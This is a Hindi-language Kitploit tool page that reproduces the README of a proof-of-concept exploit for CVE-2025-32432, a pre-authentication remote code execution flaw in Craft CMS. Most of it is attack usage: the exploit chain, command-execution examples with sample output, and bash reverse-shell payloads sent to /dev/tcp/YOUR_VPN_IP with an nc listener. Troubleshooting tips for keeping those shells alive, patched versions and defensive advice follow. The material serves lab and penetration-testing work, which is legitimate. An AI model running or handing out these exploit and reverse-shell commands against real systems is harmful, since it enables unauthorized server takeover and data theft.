Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32432-POC | Kitploit
उपकरण/GitHubGitHub/theeomega/cve-2025-32432-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubtheeomega/cve-2025-32432-poc

CVE-2025-32432-POC

रिपॉजिटरी देखें
28 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Craft CMS CVE-2025-32432 सिंगल-टार्गेट PoC

केवल अधिकृत परीक्षण। यह रिपॉज़िटरी नियंत्रित लैब वातावरण, Hack The Box जैसे CTF प्लेटफ़ॉर्म, आंतरिक सत्यापन और रक्षात्मक सत्यापन के लिए है। इसे उन सिस्टमों पर न चलाएँ जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।

अवलोकन

यह प्रोजेक्ट CVE-2025-32432 के लिए एक सिंगल-टार्गेट प्रूफ-ऑफ-कॉन्सेप्ट है, जो प्री-ऑथेंटिकेशन Craft CMS रिमोट कोड एक्ज़ीक्यूशन समस्या है।

PoC दो चरणों में कार्य करता है:

  1. भेद्यता पुष्टि Craft CMS के एसेट ट्रांसफ़ॉर्म जनरेशन एंडपॉइंट के माध्यम से phpinfo() गैजेट का उपयोग करके।
  2. वैकल्पिक कमांड निष्पादन दो-चरणीय सत्र-फ़ाइल इन्क्लूड श्रृंखला का उपयोग करके।

स्क्रिप्ट को कुछ सार्वजनिक PoCs में देखी जाने वाली सामान्य फ़ॉल्स-नेगेटिव समस्या से बचने के लिए डिज़ाइन किया गया है: एक सामान्य इमेज ट्रांसफ़ॉर्म अनुरोध 404 लौटा सकता है, जबकि वही एंडपॉइंट और assetId वास्तविक गैजेट पेलोड का उपयोग करने पर फिर भी कार्य करते हैं।

प्रभावित संस्करण

आधिकारिक Craft CMS एडवाइज़री और सार्वजनिक एडवाइज़री डेटाबेस के अनुसार, प्रभावित रेंज हैं:

Craft CMS ब्रांच

यदि आप किसी Craft CMS डिप्लॉयमेंट के लिए ज़िम्मेदार हैं तो तुरंत फिक्स्ड रिलीज़ में अपग्रेड करें।

तकनीकी सारांश

PoC इस प्रवाह का अनुसरण करता है:

root@kitploit:~
Get CSRF token
      |
      v
Test endpoint + assetId with phpinfo gadget
      |
      v
Confirm vulnerable response contains PHP Version / PHP License
      |
      v
Poison Craft session return URL with PHP payload
      |
      v
Trigger yii\rbac\PhpManager to include the PHP session file
      |
      v
Execute optional command

महत्वपूर्ण कार्यान्वयन विवरण:

  • खोज phpinfo गैजेट का उपयोग करती है, सामान्य ट्रांसफ़ॉर्म अनुरोध का नहीं।
  • कमांड hex के रूप में पास किए जाते हैं ताकि क्वेरी स्ट्रिंग स्पेस, कोट्स, पाइप्स या एम्परसैंड्स से टूट न जाए।
  • परीक्षण किए जाने वाले डिफ़ॉल्ट PHP सत्र निर्देशिकाएँ हैं:
    • /var/lib/php/sessions
    • /var/lib/php/session
    • /tmp
  • रिवर्स-शेल परिदृश्यों के लिए एक --timeout विकल्प शामिल है।

फ़ाइलें

root@kitploit:~
craftcms_cve_2025_32432_public_poc.py   Main single-target PoC
README.md                               Project documentation

आवश्यकताएँ

  • Python 3.9+
  • requests
  • urllib3

निर्भरताएँ स्थापित करें:

root@kitploit:~
python3 -m pip install requests urllib3

उपयोग

1. केवल-जाँच मोड

यह केवल phpinfo गैजेट का उपयोग करके भेद्यता की पुष्टि करता है।

root@kitploit:~
python3 craftcms_cve_2025_32432_public_poc.py -u http://target.local

अपेक्षित सफल आउटपुट:

root@kitploit:~
[+] phpinfo triggered
[+] Working endpoint: http://target.local/index.php?p=admin/actions/assets/generate-transform
[+] Working assetId: 0
[+] Vulnerability confirmed by phpinfo gadget
[*] Check-only mode. Use -c 'id' to run a command.

phpinfo प्रतिक्रिया इस रूप में सहेजी जाती है:

root@kitploit:~
phpinfo_success.html

2. एक सरल कमांड निष्पादित करें

root@kitploit:~
python3 craftcms_cve_2025_32432_public_poc.py -u http://target.local -c "id"

उदाहरण सफल आउटपुट:

root@kitploit:~
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

3. ज्ञात एंडपॉइंट और एसेट ID का उपयोग करें

इसका उपयोग तब करें जब आप पहले से कार्यशील मान जानते हों।

root@kitploit:~
python3 craftcms_cve_2025_32432_public_poc.py \
  -u http://target.local \
  -c "id" \
  -a 0 \
  --endpoint "http://target.local/index.php?p=admin/actions/assets/generate-transform" \
  --session-dir /var/lib/php/sessions

4. कस्टम फ्रंट कंट्रोलर

कुछ टार्गेट x.php जैसे कस्टम फ्रंट कंट्रोलर का उपयोग कर सकते हैं।

root@kitploit:~
python3 craftcms_cve_2025_32432_public_poc.py \
  -u http://target.local \
  --front x.php \
  -c "id"

यह ऐसे रूट्स का परीक्षण करता है:

root@kitploit:~
http://target.local/x.php?p=admin/actions/assets/generate-transform

5. रिवर्स शेल उपयोग

पहले एक लिसनर प्रारंभ करें:

root@kitploit:~
rlwrap -cAr nc -lvnp 12345

फिर रिवर्स-शेल कमांड के साथ PoC चलाएँ:

root@kitploit:~
python3 craftcms_cve_2025_32432_public_poc.py \
  -u http://target.local \
  -c "bash -lc 'bash -i >& /dev/tcp/YOUR_VPN_IP/12345 0>&1'" \
  --timeout 0

--timeout 0 अनुरोध टाइमआउट को अक्षम करता है। यह उपयोगी है क्योंकि रिवर्स शेल अक्सर HTTP अनुरोध को खुला रखती हैं।

डिटैच्ड वेरिएंट:

root@kitploit:~
python3 craftcms_cve_2025_32432_public_poc.py \
  -u http://target.local \
  -c "bash -lc 'setsid bash -c \"bash -i >& /dev/tcp/YOUR_VPN_IP/12345 0>&1\" >/dev/null 2>&1 &'" \
  --timeout 0

विकल्प

समस्या निवारण

सामान्य स्कैन के दौरान assetId 0 -> HTTP 404

खोज के लिए सामान्य ट्रांसफ़ॉर्म अनुरोध पर भरोसा न करें। कुछ टार्गेट सामान्य ट्रांसफ़ॉर्म बॉडी के लिए 404 लौटाते हैं लेकिन फिर भी गैजेट पेलोड निष्पादित करते हैं।

यह PoC phpinfo गैजेट का उपयोग करके ही मान्य संयोजन खोजता है।

phpinfo कार्य करता है, लेकिन कमांड निष्पादन विफल होता है

सत्र निर्देशिका मैन्युअल रूप से निर्दिष्ट करने का प्रयास करें:

root@kitploit:~
python3 craftcms_cve_2025_32432_public_poc.py \
  -u http://target.local \
  -c "id" \
  --session-dir /var/lib/php/sessions

फिर प्रयास करें:

root@kitploit:~
--session-dir /var/lib/php/session

या:

root@kitploit:~
--session-dir /tmp

रिवर्स शेल कनेक्ट होती है, फिर जल्दी समाप्त हो जाती है

इनमें से कोई एक तरीका उपयोग करें:

  1. अनुरोध टाइमआउट अक्षम करें:
root@kitploit:~
--timeout 0
  1. setsid या nohup के साथ डिटैच्ड पेलोड का उपयोग करें।

  2. सत्यापित करें कि आपका कॉलबैक IP सही है:

root@kitploit:~
ip -br a | grep tun

रिवर्स शेल के दौरान रीड टाइमआउट

यदि रिवर्स शेल सफलतापूर्वक कनेक्ट हुई है तो यह सामान्य हो सकता है। टाइमआउट को विफलता मानने से पहले अपने लिसनर की जाँच करें।

कमांड आउटपुट अनुपलब्ध है

पहले एक सरल कमांड आज़माएँ:

root@kitploit:~
-c "id"
-c "whoami"
-c "pwd"

यदि सरल कमांड कार्य करते हैं लेकिन जटिल कमांड विफल होते हैं, तो कमांड को सावधानीपूर्वक कोट करें या डिटैच्ड शेल पेलोड का उपयोग करें।

उदाहरण लैब आउटपुट

root@kitploit:~
[*] Target: http://orion.htb
[*] Front controller: index.php
[+] CSRF token found via http://orion.htb/index.php?p=admin/dashboard
[*] Testing endpoint: http://orion.htb/index.php?p=admin/actions/assets/generate-transform
    assetId 0 -> HTTP 200
[+] phpinfo triggered
[+] Working endpoint: http://orion.htb/index.php?p=admin/actions/assets/generate-transform
[+] Working assetId: 0
[+] Vulnerability confirmed by phpinfo gadget
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

रक्षात्मक मार्गदर्शन

यदि आप किसी Craft CMS इंस्टेंस का प्रबंधन करते हैं:

  1. Craft CMS 3.9.15, 4.14.15, 5.6.17 या उसके बाद के संस्करण में अपग्रेड करें।
  2. संदिग्ध PHP फ़ाइलों या वेब शेल्स के लिए वेब रूट्स की समीक्षा करें।
  3. एसेट ट्रांसफ़ॉर्म रूट्स के लिए संदिग्ध अनुरोधों हेतु PHP सत्र निर्देशिकाओं और वेब सर्वर लॉग्स की समीक्षा करें।
  4. यदि शोषण का संदेह है तो .env से रहस्यों और डेटाबेस क्रेडेंशियल्स को रोटेट करें।
  5. जहाँ संभव हो प्रशासनिक रूट्स तक सार्वजनिक पहुँच प्रतिबंधित करें।
  6. संदिग्ध समझौता विंडो के आसपास सर्वर फ़ाइलसिस्टम टाइमस्टैम्प्स की समीक्षा करें।

संदर्भ

  • Craft CMS आधिकारिक एडवाइज़री: https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432
  • GitHub एडवाइज़री डेटाबेस: https://github.com/advisories/GHSA-f3gw-9ww9-jmc3
  • NVD प्रविष्टि: https://nvd.nist.gov/vuln/detail/CVE-2025-32432
  • SensePost तकनीकी विश्लेषण: https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक, शोध, लैब और रक्षात्मक सत्यापन उद्देश्यों के लिए प्रदान किया गया है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है। केवल उन्हीं सिस्टमों का परीक्षण करें जिनके आप स्वामी हैं या जिनके मूल्यांकन की आपके पास स्पष्ट लिखित अनुमति है।

टूल डाउनलोड करें
प्रभावित संस्करण
फिक्स्ड संस्करण
3.x< 3.9.153.9.15
4.x< 4.14.154.14.15
5.x< 5.6.175.6.17
विकल्पविवरणडिफ़ॉल्ट
-u, --urlटार्गेट बेस URLआवश्यक
-c, --cmdphpinfo पुष्टि के बाद निष्पादित करने हेतु वैकल्पिक कमांडकोई नहीं
--frontफ्रंट कंट्रोलर फ़ाइलनामindex.php
-s, --scan-maxphpinfo गैजेट के साथ परीक्षण हेतु अधिकतम assetId50
-a, --assetज्ञात कार्यशील एसेट IDकोई नहीं
--endpointज्ञात कार्यशील generate-transform एंडपॉइंटकोई नहीं
--session-dirPHP सत्र निर्देशिका। इसे कई बार प्रदान किया जा सकता हैबिल्ट-इन सूची
--timeoutकमांड ट्रिगर हेतु अनुरोध टाइमआउट। कोई टाइमआउट न होने पर 0 उपयोग करें20